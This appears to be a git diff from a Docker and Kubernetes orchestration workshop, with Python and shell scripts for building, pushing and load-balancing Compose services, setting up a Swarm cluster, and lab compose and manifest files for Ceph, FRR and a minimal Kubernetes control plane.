import subprocess
|
||||
import time
|
||||
|
||||
registry = os.environ.get("DOCKER_REGISTRY")
|
||||
|
||||
if not registry:
|
||||
print("Please set the DOCKER_REGISTRY variable, e.g.:")
|
||||
print("export DOCKER_REGISTRY=jpetazzo # use the Docker Hub")
|
||||
print("export DOCKER_REGISTRY=localhost:5000 # use a local registry")
|
||||
exit(1)
|
||||
|
||||
# Get the name of the current directory.
|
||||
project_name = os.path.basename(os.path.realpath("."))
|
||||
|
||||
# Version used to tag the generated Docker image, using the UNIX timestamp or the given version.
|
||||
if "VERSION" not in os.environ:
|
||||
version = str(int(time.time()))
|
||||
else:
|
||||
version = os.environ["VERSION"]
|
||||
|
||||
# Execute "docker-compose build" and abort if it fails.
|
||||
subprocess.check_call(["docker-compose", "-f", "docker-compose.yml", "build"])
|
||||
|
||||
# Load the services from the input docker-compose.yml file.
|
||||
# TODO: run parallel builds.
|
||||
compose_file = ComposeFile("docker-compose.yml")
|
||||
|
||||
# Iterate over all services that have a "build" definition.
|
||||
# Tag them, and initiate a push in the background.
|
||||
push_operations = dict()
|
||||
for service_name, service in compose_file.services.items():
|
||||
if "build" in service:
|
||||
compose_image = "{}_{}".format(project_name, service_name)
|
||||
registry_image = "{}/{}:{}".format(registry, compose_image, version)
|
||||
# Re-tag the image so that it can be uploaded to the registry.
|
||||
subprocess.check_call(["docker", "tag", compose_image, registry_image])
|
||||
# Spawn "docker push" to upload the image.
|
||||
push_operations[service_name] = subprocess.Popen(["docker", "push", registry_image])
|
||||
# Replace the "build" definition by an "image" definition,
|
||||
# using the name of the image on the registry.
|
||||
del service["build"]
|
||||
service["image"] = registry_image
|
||||
|
||||
# Wait for push operations to complete.
|
||||
for service_name, popen_object in push_operations.items():
|
||||
print("Waiting for {} push to complete...".format(service_name))
|
||||
popen_object.wait()
|
||||
print("Done.")
|
||||
|
||||
# Write the new docker-compose.yml file.
|
||||
if "COMPOSE_FILE" not in os.environ:
|
||||
os.environ["COMPOSE_FILE"] = "docker-compose.yml-{}".format(version)
|
||||
print("Writing to new Compose file:")
|
||||
else:
|
||||
print("Writing to provided Compose file:")
|
||||
|
||||
print("COMPOSE_FILE={}".format(os.environ["COMPOSE_FILE"]))
|
||||
compose_file.save()
|
||||
|
||||
76
bin/common.py
Executable file
@@ -0,0 +1,76 @@
|
||||
import os
|
||||
import subprocess
|
||||
import sys
|
||||
import time
|
||||
import yaml
|
||||
|
||||
|
||||
def COMPOSE_FILE():
|
||||
if "COMPOSE_FILE" not in os.environ:
|
||||
print("The $COMPOSE_FILE environment variable is not set. Aborting.")
|
||||
exit(1)
|
||||
return os.environ["COMPOSE_FILE"]
|
||||
|
||||
|
||||
class ComposeFile(object):
|
||||
|
||||
def __init__(self, filename=None):
|
||||
if filename is None:
|
||||
filename = COMPOSE_FILE()
|
||||
if not os.path.isfile(filename):
|
||||
print("File {!r} does not exist. Aborting.".format(filename))
|
||||
exit(1)
|
||||
self.data = yaml.load(open(filename))
|
||||
|
||||
@property
|
||||
def services(self):
|
||||
if self.data.get("version") == "2":
|
||||
return self.data["services"]
|
||||
else:
|
||||
return self.data
|
||||
|
||||
def save(self, filename=None):
|
||||
if filename is None:
|
||||
filename = COMPOSE_FILE()
|
||||
with open(filename, "w") as f:
|
||||
yaml.safe_dump(self.data, f, default_flow_style=False)
|
||||
|
||||
# Executes a bunch of commands in parallel, but no more than N at a time.
|
||||
# This allows to execute concurrently a large number of tasks, without
|
||||
# turning into a fork bomb.
|
||||
# `parallelism` is the number of tasks to execute simultaneously.
|
||||
# `commands` is a list of tasks to execute.
|
||||
# Each task is itself a list, where the first element is a descriptive
|
||||
# string, and the folloowing elements are the arguments to pass to Popen.
|
||||
def parallel_run(commands, parallelism):
|
||||
running = []
|
||||
# While stuff is running, or we have stuff to run...
|
||||
while commands or running:
|
||||
# While there is stuff to run, and room in the pipe...
|
||||
while commands and len(running)<parallelism:
|
||||
command = commands.pop(0)
|
||||
print("START {}".format(command[0]))
|
||||
popen = subprocess.Popen(
|
||||
command[1:], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
|
||||
popen._desc = command[0]
|
||||
running.append(popen)
|
||||
must_sleep = True
|
||||
for popen in running:
|
||||
status = popen.poll()
|
||||
if status is not None:
|
||||
must_sleep = False
|
||||
running.remove(popen)
|
||||
if status==0:
|
||||
print("OK {}".format(popen._desc))
|
||||
else:
|
||||
print("ERROR {} [Exit status: {}]"
|
||||
.format(popen._desc, status))
|
||||
output = "\n" + popen.communicate()[0].strip()
|
||||
output = output.replace("\n", "\n| ")
|
||||
print(output)
|
||||
else:
|
||||
print("WAIT ({} running, {} more to run)"
|
||||
.format(len(running), len(commands)))
|
||||
if must_sleep:
|
||||
time.sleep(1)
|
||||
|
||||
69
bin/configure-ambassadors.py
Executable file
@@ -0,0 +1,69 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
from common import parallel_run
|
||||
import os
|
||||
import subprocess
|
||||
|
||||
project_name = os.path.basename(os.path.realpath("."))
|
||||
|
||||
# Get all services and backends in our compose application.
|
||||
containers_data = subprocess.check_output([
|
||||
"docker", "ps",
|
||||
"--filter", "label=com.docker.compose.project={}".format(project_name),
|
||||
"--format", '{{ .ID }} '
|
||||
'{{ .Label "com.docker.compose.service" }} '
|
||||
'{{ .Ports }}',
|
||||
])
|
||||
|
||||
# Build list of backends.
|
||||
frontend_ports = dict()
|
||||
backends = dict()
|
||||
for container in containers_data.split('\n'):
|
||||
if not container:
|
||||
continue
|
||||
# TODO: support services with multiple ports!
|
||||
container_id, service_name, port = container.split(' ')
|
||||
if not port:
|
||||
continue
|
||||
backend, frontend = port.split("->")
|
||||
backend_addr, backend_port = backend.split(':')
|
||||
frontend_port, frontend_proto = frontend.split('/')
|
||||
# TODO: deal with udp (mostly skip it?)
|
||||
assert frontend_proto == "tcp"
|
||||
# TODO: check inconsistencies between port mappings
|
||||
frontend_ports[service_name] = frontend_port
|
||||
if service_name not in backends:
|
||||
backends[service_name] = []
|
||||
backends[service_name].append((backend_addr, backend_port))
|
||||
|
||||
# Get all existing ambassadors for this application.
|
||||
ambassadors_data = subprocess.check_output([
|
||||
"docker", "ps",
|
||||
"--filter", "label=ambassador.project={}".format(project_name),
|
||||
"--format", '{{ .ID }} '
|
||||
'{{ .Label "ambassador.service" }} '
|
||||
'{{ .Label "ambassador.bindaddr" }}',
|
||||
])
|
||||
|
||||
# Update ambassadors.
|
||||
operations = []
|
||||
for ambassador in ambassadors_data.split('\n'):
|
||||
if not ambassador:
|
||||
continue
|
||||
ambassador_id, service_name, bind_address = ambassador.split()
|
||||
print("Updating configuration for {}/{} -> {}:{} -> {}"
|
||||
.format(service_name, ambassador_id,
|
||||
bind_address, frontend_ports[service_name],
|
||||
backends[service_name]))
|
||||
command = [
|
||||
ambassador_id,
|
||||
"docker", "run", "--rm", "--volumes-from", ambassador_id,
|
||||
"jpetazzo/hamba", "reconfigure",
|
||||
"{}:{}".format(bind_address, frontend_ports[service_name])
|
||||
]
|
||||
for backend_addr, backend_port in backends[service_name]:
|
||||
command.extend([backend_addr, backend_port])
|
||||
operations.append(command)
|
||||
|
||||
# Execute all commands in parallel.
|
||||
parallel_run(operations, 10)
|
||||
71
bin/create-ambassadors.py
Executable file
@@ -0,0 +1,71 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
from common import ComposeFile, parallel_run
|
||||
import os
|
||||
import subprocess
|
||||
|
||||
config = ComposeFile()
|
||||
|
||||
project_name = os.path.basename(os.path.realpath("."))
|
||||
|
||||
# Get all services in our compose application.
|
||||
containers_data = subprocess.check_output([
|
||||
"docker", "ps",
|
||||
"--filter", "label=com.docker.compose.project={}".format(project_name),
|
||||
"--format", '{{ .ID }} {{ .Label "com.docker.compose.service" }}',
|
||||
])
|
||||
|
||||
# Get all existing ambassadors for this application.
|
||||
ambassadors_data = subprocess.check_output([
|
||||
"docker", "ps",
|
||||
"--filter", "label=ambassador.project={}".format(project_name),
|
||||
"--format", '{{ .ID }} '
|
||||
'{{ .Label "ambassador.container" }} '
|
||||
'{{ .Label "ambassador.service" }}',
|
||||
])
|
||||
|
||||
# Build a set of existing ambassadors.
|
||||
ambassadors = dict()
|
||||
for ambassador in ambassadors_data.split('\n'):
|
||||
if not ambassador:
|
||||
continue
|
||||
ambassador_id, container_id, linked_service = ambassador.split()
|
||||
ambassadors[container_id, linked_service] = ambassador_id
|
||||
|
||||
operations = []
|
||||
|
||||
# Start the missing ambassadors.
|
||||
for container in containers_data.split('\n'):
|
||||
if not container:
|
||||
continue
|
||||
container_id, service_name = container.split()
|
||||
extra_hosts = config.services[service_name].get("extra_hosts", {})
|
||||
for linked_service, bind_address in extra_hosts.items():
|
||||
description = "Ambassador {}/{}/{}".format(
|
||||
service_name, container_id, linked_service)
|
||||
ambassador_id = ambassadors.pop((container_id, linked_service), None)
|
||||
if ambassador_id:
|
||||
print("{} already exists: {}".format(description, ambassador_id))
|
||||
else:
|
||||
print("{} not found, creating it.".format(description))
|
||||
operations.append([
|
||||
description,
|
||||
"docker", "run", "-d",
|
||||
"--net", "container:{}".format(container_id),
|
||||
"--label", "ambassador.project={}".format(project_name),
|
||||
"--label", "ambassador.container={}".format(container_id),
|
||||
"--label", "ambassador.service={}".format(linked_service),
|
||||
"--label", "ambassador.bindaddr={}".format(bind_address),
|
||||
"jpetazzo/hamba", "run"
|
||||
])
|
||||
|
||||
# Destroy extraneous ambassadors.
|
||||
for ambassador_id in ambassadors.values():
|
||||
print("{} is not useful anymore, destroying it.".format(ambassador_id))
|
||||
operations.append([
|
||||
"rm -f {}".format(ambassador_id),
|
||||
"docker", "rm", "-f", ambassador_id,
|
||||
])
|
||||
|
||||
# Execute all commands in parallel.
|
||||
parallel_run(operations, 10)
|
||||
3
bin/delete-ambassadors.sh
Executable file
@@ -0,0 +1,3 @@
|
||||
#!/bin/sh
|
||||
docker ps -q --filter label=ambassador.project=dockercoins |
|
||||
xargs docker rm -f
|
||||
16
bin/fixup-yaml.sh
Executable file
@@ -0,0 +1,16 @@
|
||||
#!/bin/sh
|
||||
# Some tools will choke on the YAML files generated by PyYAML;
|
||||
# in particular on a section like this one:
|
||||
#
|
||||
# service:
|
||||
# ports:
|
||||
# - 8000:5000
|
||||
#
|
||||
# This script adds two spaces in front of the dash in those files.
|
||||
# Warning: it is a hack, and probably won't work on some YAML files.
|
||||
[ -f "$COMPOSE_FILE" ] || {
|
||||
echo "Cannot find COMPOSE_FILE"
|
||||
exit 1
|
||||
}
|
||||
sed -i 's/^ -/ -/' $COMPOSE_FILE
|
||||
|
||||
38
bin/link-to-ambassadors.py
Executable file
@@ -0,0 +1,38 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
from common import ComposeFile
|
||||
import yaml
|
||||
|
||||
config = ComposeFile()
|
||||
|
||||
# The ambassadors need to know the service port to use.
|
||||
# Those ports must be declared here.
|
||||
ports = yaml.load(open("ports.yml"))
|
||||
|
||||
def generate_local_addr():
|
||||
last_byte = 2
|
||||
while last_byte<255:
|
||||
yield "127.127.0.{}".format(last_byte)
|
||||
last_byte += 1
|
||||
|
||||
for service_name, service in config.services.items():
|
||||
if "links" in service:
|
||||
for link, local_addr in zip(service["links"], generate_local_addr()):
|
||||
if link not in ports:
|
||||
print("Skipping link {} in service {} "
|
||||
"(no port mapping defined). "
|
||||
"Your code will probably break."
|
||||
.format(link, service_name))
|
||||
continue
|
||||
if "extra_hosts" not in service:
|
||||
service["extra_hosts"] = {}
|
||||
service["extra_hosts"][link] = local_addr
|
||||
del service["links"]
|
||||
if "ports" in service:
|
||||
del service["ports"]
|
||||
if "volumes" in service:
|
||||
del service["volumes"]
|
||||
if service_name in ports:
|
||||
service["ports"] = [ ports[service_name] ]
|
||||
|
||||
config.save()
|
||||
46
bin/reconfigure-load-balancers.py
Executable file
@@ -0,0 +1,46 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
# FIXME: hardcoded
|
||||
PORT="80"
|
||||
|
||||
import os
|
||||
import subprocess
|
||||
|
||||
project_name = os.path.basename(os.path.realpath("."))
|
||||
|
||||
# Get all existing services for this application.
|
||||
containers_data = subprocess.check_output([
|
||||
"docker", "ps",
|
||||
"--filter", "label=com.docker.compose.project={}".format(project_name),
|
||||
"--format", '{{ .Label "com.docker.compose.service" }} '
|
||||
'{{ .Label "com.docker.compose.container-number" }} '
|
||||
'{{ .Label "loadbalancer" }}',
|
||||
])
|
||||
|
||||
load_balancers = dict()
|
||||
for line in containers_data.split('\n'):
|
||||
if not line:
|
||||
continue
|
||||
service_name, container_number, load_balancer = line.split(' ')
|
||||
if load_balancer:
|
||||
if load_balancer not in load_balancers:
|
||||
load_balancers[load_balancer] = []
|
||||
load_balancers[load_balancer].append((service_name, int(container_number)))
|
||||
|
||||
for load_balancer, backends in load_balancers.items():
|
||||
# FIXME: iterate on all load balancers
|
||||
container_name = "{}_{}_1".format(project_name, load_balancer)
|
||||
command = [
|
||||
"docker", "run", "--rm",
|
||||
"--volumes-from", container_name,
|
||||
"--net", "container:{}".format(container_name),
|
||||
"jpetazzo/hamba", "reconfigure", PORT,
|
||||
]
|
||||
command.extend(
|
||||
"{}_{}_{}:{}".format(project_name, backend_name, backend_number, PORT)
|
||||
for (backend_name, backend_number) in sorted(backends)
|
||||
)
|
||||
print("Updating configuration for {} with {} backend(s)..."
|
||||
.format(container_name, len(backends)))
|
||||
subprocess.check_output(command)
|
||||
|
||||
201
bin/setup-all-the-things.sh
Executable file
@@ -0,0 +1,201 @@
|
||||
#!/bin/sh
|
||||
unset DOCKER_REGISTRY
|
||||
unset DOCKER_HOST
|
||||
unset COMPOSE_FILE
|
||||
|
||||
SWARM_IMAGE=${SWARM_IMAGE:-swarm}
|
||||
|
||||
prepare_1_check_ssh_keys () {
|
||||
for N in $(seq 1 5); do
|
||||
ssh node$N true
|
||||
done
|
||||
}
|
||||
|
||||
prepare_2_compile_swarm () {
|
||||
cd ~
|
||||
git clone git://github.com/docker/swarm
|
||||
cd swarm
|
||||
[[ -z "$1" ]] && {
|
||||
echo "Specify which revision to build."
|
||||
return
|
||||
}
|
||||
git checkout "$1" || return
|
||||
mkdir -p image
|
||||
docker build -t docker/swarm:$1 .
|
||||
docker run -i --entrypoint sh docker/swarm:$1 \
|
||||
-c 'cat $(which swarm)' > image/swarm
|
||||
chmod +x image/swarm
|
||||
cat >image/Dockerfile <<EOF
|
||||
FROM scratch
|
||||
COPY ./swarm /swarm
|
||||
ENTRYPOINT ["/swarm", "-debug", "-experimental"]
|
||||
EOF
|
||||
docker build -t jpetazzo/swarm:$1 image
|
||||
docker login
|
||||
docker push jpetazzo/swarm:$1
|
||||
docker logout
|
||||
SWARM_IMAGE=jpetazzo/swarm:$1
|
||||
}
|
||||
|
||||
clean_1_containers () {
|
||||
for N in $(seq 1 5); do
|
||||
ssh node$N "docker ps -aq | xargs -r -n1 -P10 docker rm -f"
|
||||
done
|
||||
}
|
||||
|
||||
clean_2_volumes () {
|
||||
for N in $(seq 1 5); do
|
||||
ssh node$N "docker volume ls -q | xargs -r docker volume rm"
|
||||
done
|
||||
}
|
||||
|
||||
clean_3_images () {
|
||||
for N in $(seq 1 5); do
|
||||
ssh node$N "docker images | awk '/dockercoins|jpetazzo/ {print \$1\":\"\$2}' | xargs -r docker rmi -f"
|
||||
done
|
||||
}
|
||||
|
||||
clean_4_machines () {
|
||||
rm -rf ~/.docker/machine/
|
||||
}
|
||||
|
||||
clean_all () {
|
||||
clean_1_containers
|
||||
clean_2_volumes
|
||||
clean_3_images
|
||||
clean_4_machines
|
||||
}
|
||||
|
||||
dm_swarm () {
|
||||
eval $(docker-machine env node1 --swarm)
|
||||
}
|
||||
dm_node1 () {
|
||||
eval $(docker-machine env node1)
|
||||
}
|
||||
|
||||
setup_1_swarm () {
|
||||
grep node[12345] /etc/hosts | grep -v ^127 |
|
||||
while read IPADDR NODENAME; do
|
||||
docker-machine create --driver generic \
|
||||
--engine-opt cluster-store=consul://localhost:8500 \
|
||||
--engine-opt cluster-advertise=eth0:2376 \
|
||||
--swarm --swarm-master --swarm-image $SWARM_IMAGE \
|
||||
--swarm-discovery consul://localhost:8500 \
|
||||
--swarm-opt replication --swarm-opt advertise=$IPADDR:3376 \
|
||||
--generic-ssh-user docker --generic-ip-address $IPADDR $NODENAME
|
||||
done
|
||||
}
|
||||
|
||||
setup_2_consul () {
|
||||
IPADDR=$(ssh node1 ip a ls dev eth0 |
|
||||
sed -n 's,.*inet \(.*\)/.*,\1,p')
|
||||
|
||||
for N in 1 2 3 4 5; do
|
||||
ssh node$N -- docker run -d --restart=always --name consul_node$N \
|
||||
-e CONSUL_BIND_INTERFACE=eth0 --net host consul \
|
||||
agent -server -retry-join $IPADDR -bootstrap-expect 5 \
|
||||
-ui -client 0.0.0.0
|
||||
done
|
||||
}
|
||||
|
||||
setup_3_wait () {
|
||||
# Wait for a Swarm master
|
||||
dm_swarm
|
||||
while ! docker ps; do sleep 1; done
|
||||
|
||||
# Wait for all nodes to be there
|
||||
while ! [ "$(docker info | grep "^Nodes:")" = "Nodes: 5" ]; do sleep 1; done
|
||||
}
|
||||
|
||||
setup_4_registry () {
|
||||
cd ~/orchestration-workshop/registry
|
||||
dm_swarm
|
||||
docker-compose up -d
|
||||
for N in $(seq 2 5); do
|
||||
docker-compose scale frontend=$N
|
||||
done
|
||||
}
|
||||
|
||||
setup_5_btp_dockercoins () {
|
||||
cd ~/orchestration-workshop/dockercoins
|
||||
dm_node1
|
||||
export DOCKER_REGISTRY=localhost:5000
|
||||
cp docker-compose.yml-v2 docker-compose.yml
|
||||
~/orchestration-workshop/bin/build-tag-push.py | tee /tmp/btp.log
|
||||
export $(tail -n 1 /tmp/btp.log)
|
||||
}
|
||||
|
||||
setup_6_add_lbs () {
|
||||
cd ~/orchestration-workshop/dockercoins
|
||||
~/orchestration-workshop/bin/add-load-balancer-v2.py rng
|
||||
~/orchestration-workshop/bin/add-load-balancer-v2.py hasher
|
||||
}
|
||||
|
||||
setup_7_consulfs () {
|
||||
dm_swarm
|
||||
docker pull jpetazzo/consulfs
|
||||
for N in $(seq 1 5); do
|
||||
ssh node$N "docker run --rm -v /usr/local/bin:/target jpetazzo/consulfs"
|
||||
ssh node$N mkdir -p ~/consul
|
||||
ssh -f node$N "mountpoint ~/consul || consulfs localhost:8500 ~/consul"
|
||||
done
|
||||
}
|
||||
|
||||
setup_8_syncmachine () {
|
||||
while ! mountpoint ~/consul; do
|
||||
sleep 1
|
||||
done
|
||||
cp -r ~/.docker/machine ~/consul/
|
||||
for N in $(seq 2 5); do
|
||||
ssh node$N mkdir -p ~/.docker
|
||||
ssh node$N "[ -L ~/.docker/machine ] || ln -s ~/consul/machine ~/.docker"
|
||||
done
|
||||
}
|
||||
|
||||
setup_9_elk () {
|
||||
dm_swarm
|
||||
cd ~/orchestration-workshop/elk
|
||||
docker-compose up -d
|
||||
for N in $(seq 1 5); do
|
||||
docker-compose scale logstash=$N
|
||||
done
|
||||
}
|
||||
|
||||
setup_all () {
|
||||
setup_1_swarm
|
||||
setup_2_consul
|
||||
setup_3_wait
|
||||
setup_4_registry
|
||||
setup_5_btp_dockercoins
|
||||
setup_6_add_lbs
|
||||
setup_7_consulfs
|
||||
setup_8_syncmachine
|
||||
dm_swarm
|
||||
}
|
||||
|
||||
|
||||
force_remove_network () {
|
||||
dm_swarm
|
||||
NET="$1"
|
||||
for CNAME in $(docker network inspect $NET | grep Name | grep -v \"$NET\" | cut -d\" -f4); do
|
||||
echo $CNAME
|
||||
docker network disconnect -f $NET $CNAME
|
||||
done
|
||||
docker network rm $NET
|
||||
}
|
||||
|
||||
demo_1_compose_up () {
|
||||
dm_swarm
|
||||
cd ~/orchestration-workshop/dockercoins
|
||||
docker-compose up -d
|
||||
}
|
||||
|
||||
grep -qs -- MAGICMARKER "$0" && { # Don't display this line in the function lis
|
||||
echo "You should source this file, then invoke the following functions:"
|
||||
grep -- '^[a-z].*{$' "$0" | cut -d" " -f1
|
||||
}
|
||||
|
||||
show_swarm_primary () {
|
||||
dm_swarm
|
||||
docker info 2>/dev/null | grep -e ^Role -e ^Primary
|
||||
}
|
||||
12
cadvisor/docker-compose.yml
Normal file
@@ -0,0 +1,12 @@
|
||||
version: "2"
|
||||
|
||||
services:
|
||||
cadvisor:
|
||||
image: google/cadvisor
|
||||
ports:
|
||||
- "8080:8080"
|
||||
volumes:
|
||||
- "/:/rootfs:ro"
|
||||
- "/var/run:/var/run:rw"
|
||||
- "/sys:/sys:ro"
|
||||
- "/var/lib/docker/:/var/lib/docker:ro"
|
||||
19
ceph/README.md
Normal file
@@ -0,0 +1,19 @@
|
||||
# CEPH on Docker
|
||||
|
||||
Note: this doesn't quite work yet.
|
||||
|
||||
The OSD containers need to be started twice (the first time, they fail
|
||||
initializing; second time is a champ).
|
||||
|
||||
Also, it looks like you need at least two OSD containers (or the OSD
|
||||
container should have two disks/directories, whatever).
|
||||
|
||||
RadosGw is listening on port 8080.
|
||||
|
||||
The `admin` container will create a `docker` user using `radosgw-admin`.
|
||||
If you run it multiple times, that's OK: further invocations are idempotent.
|
||||
|
||||
Last but not least: it looks like AWS CLI uses a new signature format
|
||||
that doesn't work with RadosGW. After almost two hours trying to figure
|
||||
out what was wrong, I tried the S3 credentials directly with boto and
|
||||
it worked immediately (I was able to create a bucket).
|
||||
53
ceph/docker-compose.yml
Normal file
@@ -0,0 +1,53 @@
|
||||
version: "2"
|
||||
|
||||
services:
|
||||
mon:
|
||||
image: ceph/daemon
|
||||
command: mon
|
||||
environment:
|
||||
CEPH_PUBLIC_NETWORK: 10.33.0.0/16
|
||||
MON_IP: 10.33.0.2
|
||||
osd:
|
||||
image: ceph/daemon
|
||||
command: osd_directory
|
||||
depends_on:
|
||||
- mon
|
||||
volumes_from:
|
||||
- mon
|
||||
volumes:
|
||||
- /var/lib/ceph/osd
|
||||
mds:
|
||||
image: ceph/daemon
|
||||
command: mds
|
||||
environment:
|
||||
CEPHFS_CREATE: 1
|
||||
depends_on:
|
||||
- mon
|
||||
volumes_from:
|
||||
- mon
|
||||
rgw:
|
||||
image: ceph/daemon
|
||||
command: rgw
|
||||
depends_on:
|
||||
- mon
|
||||
volumes_from:
|
||||
- mon
|
||||
environment:
|
||||
CEPH_OPTS: --verbose
|
||||
admin:
|
||||
image: ceph/daemon
|
||||
entrypoint: radosgw-admin
|
||||
depends_on:
|
||||
- mon
|
||||
volumes_from:
|
||||
- mon
|
||||
command: user create --uid=docker --display-name=docker
|
||||
|
||||
networks:
|
||||
default:
|
||||
ipam:
|
||||
driver: default
|
||||
config:
|
||||
- subnet: 10.33.0.0/16
|
||||
gateway: 10.33.0.1
|
||||
|
||||
@@ -1,9 +0,0 @@
|
||||
hostname frr
|
||||
router bgp 64512
|
||||
network 1.0.0.2/32
|
||||
bgp log-neighbor-changes
|
||||
neighbor kube peer-group
|
||||
neighbor kube remote-as 64512
|
||||
neighbor kube route-reflector-client
|
||||
bgp listen range 0.0.0.0/0 peer-group kube
|
||||
log stdout
|
||||
@@ -1,2 +0,0 @@
|
||||
hostname frr
|
||||
log stdout
|
||||
@@ -1,34 +0,0 @@
|
||||
version: "3"
|
||||
|
||||
services:
|
||||
bgpd:
|
||||
image: ajones17/frr:662
|
||||
volumes:
|
||||
- ./conf:/etc/frr
|
||||
- ./run:/var/run/frr
|
||||
network_mode: host
|
||||
entrypoint: /usr/lib/frr/bgpd -f /etc/frr/bgpd.conf --log=stdout --log-level=debug --no_kernel
|
||||
restart: always
|
||||
|
||||
zebra:
|
||||
image: ajones17/frr:662
|
||||
volumes:
|
||||
- ./conf:/etc/frr
|
||||
- ./run:/var/run/frr
|
||||
network_mode: host
|
||||
entrypoint: /usr/lib/frr/zebra -f /etc/frr/zebra.conf --log=stdout --log-level=debug
|
||||
restart: always
|
||||
|
||||
vtysh:
|
||||
image: ajones17/frr:662
|
||||
volumes:
|
||||
- ./conf:/etc/frr
|
||||
- ./run:/var/run/frr
|
||||
network_mode: host
|
||||
entrypoint: vtysh -c "show ip bgp"
|
||||
|
||||
chmod:
|
||||
image: alpine
|
||||
volumes:
|
||||
- ./run:/var/run/frr
|
||||
command: chmod 777 /var/run/frr
|
||||
@@ -1,29 +0,0 @@
|
||||
version: "3"
|
||||
|
||||
services:
|
||||
|
||||
pause:
|
||||
ports:
|
||||
- 8080:8080
|
||||
image: k8s.gcr.io/pause
|
||||
|
||||
etcd:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/etcd:3.4.3
|
||||
command: etcd
|
||||
|
||||
kube-apiserver:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/hyperkube:v1.17.2
|
||||
command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount --allow-privileged
|
||||
|
||||
kube-controller-manager:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/hyperkube:v1.17.2
|
||||
command: kube-controller-manager --master http://localhost:8080 --allocate-node-cidrs --cluster-cidr=10.CLUSTER.0.0/16
|
||||
"Edit the CLUSTER placeholder first. Then, remove this line.":
|
||||
|
||||
kube-scheduler:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/hyperkube:v1.17.2
|
||||
command: kube-scheduler --master http://localhost:8080
|
||||
@@ -1,128 +0,0 @@
|
||||
---
|
||||
apiVersion: |+
|
||||
|
||||
|
||||
Make sure you update the line with --master=http://X.X.X.X:8080 below.
|
||||
Then remove this section from this YAML file and try again.
|
||||
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ConfigMap
|
||||
metadata:
|
||||
name: kube-router-cfg
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: kube-router
|
||||
data:
|
||||
cni-conf.json: |
|
||||
{
|
||||
"cniVersion":"0.3.0",
|
||||
"name":"mynet",
|
||||
"plugins":[
|
||||
{
|
||||
"name":"kubernetes",
|
||||
"type":"bridge",
|
||||
"bridge":"kube-bridge",
|
||||
"isDefaultGateway":true,
|
||||
"ipam":{
|
||||
"type":"host-local"
|
||||
}
|
||||
}
|
||||
]
|
||||
}
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: DaemonSet
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kube-router
|
||||
name: kube-router
|
||||
namespace: kube-system
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
k8s-app: kube-router
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kube-router
|
||||
annotations:
|
||||
scheduler.alpha.kubernetes.io/critical-pod: ''
|
||||
spec:
|
||||
serviceAccountName: kube-router
|
||||
containers:
|
||||
- name: kube-router
|
||||
image: docker.io/cloudnativelabs/kube-router
|
||||
imagePullPolicy: Always
|
||||
args:
|
||||
- "--run-router=true"
|
||||
- "--run-firewall=true"
|
||||
- "--run-service-proxy=true"
|
||||
- "--master=http://X.X.X.X:8080"
|
||||
env:
|
||||
- name: NODE_NAME
|
||||
valueFrom:
|
||||
fieldRef:
|
||||
fieldPath: spec.nodeName
|
||||
- name: KUBE_ROUTER_CNI_CONF_FILE
|
||||
value: /etc/cni/net.d/10-kuberouter.conflist
|
||||
livenessProbe:
|
||||
httpGet:
|
||||
path: /healthz
|
||||
port: 20244
|
||||
initialDelaySeconds: 10
|
||||
periodSeconds: 3
|
||||
resources:
|
||||
requests:
|
||||
cpu: 250m
|
||||
memory: 250Mi
|
||||
securityContext:
|
||||
privileged: true
|
||||
volumeMounts:
|
||||
- name: lib-modules
|
||||
mountPath: /lib/modules
|
||||
readOnly: true
|
||||
- name: cni-conf-dir
|
||||
mountPath: /etc/cni/net.d
|
||||
initContainers:
|
||||
- name: install-cni
|
||||
image: busybox
|
||||
imagePullPolicy: Always
|
||||
command:
|
||||
- /bin/sh
|
||||
- -c
|
||||
- set -e -x;
|
||||
if [ ! -f /etc/cni/net.d/10-kuberouter.conflist ]; then
|
||||
if [ -f /etc/cni/net.d/*.conf ]; then
|
||||
rm -f /etc/cni/net.d/*.conf;
|
||||
fi;
|
||||
TMP=/etc/cni/net.d/.tmp-kuberouter-cfg;
|
||||
cp /etc/kube-router/cni-conf.json ${TMP};
|
||||
mv ${TMP} /etc/cni/net.d/10-kuberouter.conflist;
|
||||
fi
|
||||
volumeMounts:
|
||||
- mountPath: /etc/cni/net.d
|
||||
name: cni-conf-dir
|
||||
- mountPath: /etc/kube-router
|
||||
name: kube-router-cfg
|
||||
hostNetwork: true
|
||||
tolerations:
|
||||
- key: CriticalAddonsOnly
|
||||
operator: Exists
|
||||
- effect: NoSchedule
|
||||
key: node-role.kubernetes.io/master
|
||||
operator: Exists
|
||||
- effect: NoSchedule
|
||||
key: node.kubernetes.io/not-ready
|
||||
operator: Exists
|
||||
volumes:
|
||||
- name: lib-modules
|
||||
hostPath:
|
||||
path: /lib/modules
|
||||
- name: cni-conf-dir
|
||||
hostPath:
|
||||
path: /etc/cni/net.d
|
||||
- name: kube-router-cfg
|
||||
configMap:
|
||||
name: kube-router-cfg
|
||||
|
||||
@@ -1,28 +0,0 @@
|
||||
version: "3"
|
||||
|
||||
services:
|
||||
|
||||
pause:
|
||||
ports:
|
||||
- 8080:8080
|
||||
image: k8s.gcr.io/pause
|
||||
|
||||
etcd:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/etcd:3.4.3
|
||||
command: etcd
|
||||
|
||||
kube-apiserver:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/hyperkube:v1.17.2
|
||||
command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount
|
||||
|
||||
kube-controller-manager:
|
||||
network_mode: "service:pause"
|
||||
